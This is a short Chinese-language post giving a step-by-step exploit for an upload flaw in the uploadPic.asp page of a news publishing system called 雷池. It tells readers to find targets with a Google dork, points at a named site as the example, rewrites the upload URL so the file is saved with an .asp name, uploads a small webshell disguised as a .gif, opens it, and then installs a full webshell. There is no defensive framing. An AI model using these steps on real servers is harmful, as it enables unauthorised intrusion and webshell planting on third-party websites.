雷池新闻发布系统uploadPic.asp漏洞

1.在Google搜关键字:inurl:leichinews

2.找到以下网址,如:http://www.13lang.com/leichinews/onews.asp?id=71

3.我们把leichinews/后面的改成admin/uploadPic.asp?actionType=mod&picName=13lang.asp 提交

4.把我们的小马改成.gif后缀上传,如13lang.gif

5.访问http://www.13lang.com/leichinews/uppic/13lang.asp   

呵呵,之后就是上传我们的大马吧

你可能感兴趣的:(漏洞,asp,新闻发布,uploadPic,雷池)